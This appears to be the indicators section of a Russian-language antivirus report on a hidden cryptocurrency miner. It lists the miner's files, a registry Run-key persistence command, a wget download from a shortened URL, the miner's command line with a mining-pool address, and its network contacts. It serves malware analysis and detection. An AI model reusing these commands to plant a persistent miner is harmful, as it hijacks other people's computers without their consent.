Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'AtiHotKey' = 'C:\miner\ati.vbs'
- 'C:\miner\wget.exe' http://gg.gg/0805
- 'C:\miner\32\nvidia.exe' -o stratum+tcp://37.59.31.34:3333 -u boxed.u -p x --algo scrypt -q -t 2
- '<SYSTEM32>\wscript.exe' "C:\miner\ati.vbs"
- '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AtiHotKey" /t REG_SZ /d "C:\miner\ati.vbs"
- '<SYSTEM32>\cmd.exe' /c ""C:\miner\1.bat" "
- C:\miner\32\pthreadGC2.dll
- C:\miner\64\pthreadGC2.dll
- C:\miner\64\libcurl-4.dll
- C:\miner\0805
- C:\miner\ati.vbs
- C:\miner\32\zlib1.dll
- C:\miner\32\libcurl-4.dll
- C:\miner\32\nircmd.exe
- C:\miner\32\start.bat
- C:\miner\1.bat
- C:\miner\wget.exe
- C:\miner\64\nvidia.exe
- C:\miner\32\nvidia.exe
- 'gg.gg':80
- '37.#9.31.34':3333
- gg.gg/0805
- DNS ASK gg.gg
- ClassName: 'Indicator' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'